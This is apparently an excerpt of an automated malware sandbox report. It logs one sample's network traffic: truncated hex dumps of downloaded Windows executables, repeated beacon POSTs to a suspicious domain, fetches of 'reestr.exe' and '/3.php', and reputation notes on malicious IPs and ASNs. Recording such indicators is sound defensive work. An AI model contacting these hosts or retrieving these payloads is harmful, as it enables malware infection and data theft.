00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 16 Jun 2021 10:19:42 GMTContent-Type: application/x-msdos-programContent-Length: 24576Connection: keep-aliveKeep-Alive: timeout=3Last-Modified: Tue, 09 Mar 2021 20:06:33 GMTETag: "6000-5bd201642cd53"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 4b c4 db 9d 2a aa 88 9d 2a aa 88 9d 2a aa 88 1e 36 a4 88 9c 2a aa 88 f4 35 a3 88 9f 2a aa 88 74 35 a7 88 9c 2a aa 88 52 69 63 68 9d 2a aa 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ee fd 3a 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 30 00 00 00 20 00 00 00 00 00 00 78 12 00 00 00 10 00 00 00 40 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 16 00 0b 00 04 00 00 00 00 00 00 00 00 60 00 00 00 10 00 00 83 62 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 2e 00 00 28 00 00 00 00 50 00 00 7c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 20 00 00 00 00 10 00 00 d4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 22 00 00 00 10 00 00 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 84 03 00 00 00 40 00 00 00 10 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c 0a 00 00 00 50 00 00 00 10 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 16 Jun 2021 10:19:56 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Wed, 16 Jun 2021 10:10:03 GMTETag: "94c00-5c4df4b49937d"Accept-Ranges: bytesContent-Length: 609280Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0b a1 10 26 4f c0 7e 75 4f c0 7e 75 4f c0 7e 75 20 b6 d5 75 61 c0 7e 75 20 b6 e0 75 51 c0 7e 75 20 b6 d4 75 cf c0 7e 75 46 b8 ed 75 48 c0 7e 75 4f c0 7f 75 de c0 7e 75 20 b6 d1 75 4e c0 7e 75 20 b6 e5 75 4e c0 7e 75 20 b6 e4 75 4e c0 7e 75 20 b6 e3 75 4e c0 7e 75 52 69 63 68 4f c0 7e 75 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf ad 9f 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 30 07 00 00 b0 e0 02 00 00 00 00 f0 11 00 00 00 10 00 00 00 40 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 e8 02 00 04 00 00 8c fd 09 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 e6 07 00 8a 00 00 00 f4 d9 07 00 50 00 00 00 00 c0 e6 02 b0 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 e6 02 88 1c 00 00 70 42 07 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 d1 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 07 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 2e 07 00 00 10 00 00 00 30 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2a a7 00 00 00 40 07 00 00 a8 00 00 00 34 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c c0 de 02 00 f0 07 00 00 1c 00 00 00 dc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 27 00 00 00 c0 e6 02 00 28 00 00 00 f8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 2c 01 00 00 f0 e6 02 00 2c 01 00 00 20 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 16 Jun 2021 10:20:03 GMTContent-Type: application/x-msdos-programContent-Length: 609792Connection: keep-aliveKeep-Alive: timeout=3Last-Modified: Wed, 16 Jun 2021 10:20:02 GMTETag: "94e00-5c4df6efe1761"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0b a1 10 26 4f c0 7e 75 4f c0 7e 75 4f c0 7e 75 20 b6 d5 75 61 c0 7e 75 20 b6 e0 75 51 c0 7e 75 20 b6 d4 75 cf c0 7e 75 46 b8 ed 75 48 c0 7e 75 4f c0 7f 75 de c0 7e 75 20 b6 d1 75 4e c0 7e 75 20 b6 e5 75 4e c0 7e 75 20 b6 e4 75 4e c0 7e 75 20 b6 e3 75 4e c0 7e 75 52 69 63 68 4f c0 7e 75 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7f be b4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 32 07 00 00 b0 e0 02 00 00 00 00 f0 11 00 00 00 10 00 00 00 50 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 e8 02 00 04 00 00 50 31 0a 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 f6 07 00 88 00 00 00 f4 e9 07 00 50 00 00 00 00 d0 e6 02 b0 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e7 02 90 1c 00 00 70 52 07 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e1 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 07 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8b 30 07 00 00 10 00 00 00 32 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 28 a7 00 00 00 50 07 00 00 a8 00 00 00 36 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c c0 de 02 00 00 08 00 00 1c 00 00 00 de 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 27 00 00 00 d0 e6 02 00 28 00 00 00 fa 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 2c 01 00 00 00 e7 02 00 2c 01 00 00 22 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 16 Jun 2021 10:20:22 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Thu, 11 Feb 2021 18:55:17 GMTETag: "60257d95-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 34.76.8.115
Source: global traffic HTTP traffic detected: GET //l/f/jV7rBnoBuI_ccNKoDPQZ/5866ff388122eeacca347a34e35d8f9051332339 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 34.76.8.115
Source: global traffic HTTP traffic detected: GET //l/f/jV7rBnoBuI_ccNKoDPQZ/8c9243abed88ae742099a303cebe9c7956888979 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 34.76.8.115
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 87.251.71.118Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=fQ2iY0qI4sL4iB1dG6aM1wQ5vV6aContent-Length: 213Host: 34.76.8.115
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"Host: 87.251.71.118Content-Length: 12398Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 87.251.71.118Content-Length: 12384Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 95.216.186.40 95.216.186.40
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View ASN Name: SELECTELRU SELECTELRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: GET /reestr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: GET /reestr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 256Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: 999080321test51-service10020125999080321.xyz
Source: global traffic HTTP traffic detected: GET /3.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 95.213.144.186:8080
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://999080321test51-service10020125999080321.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: 999080321test51-service10020125999080321.xyz
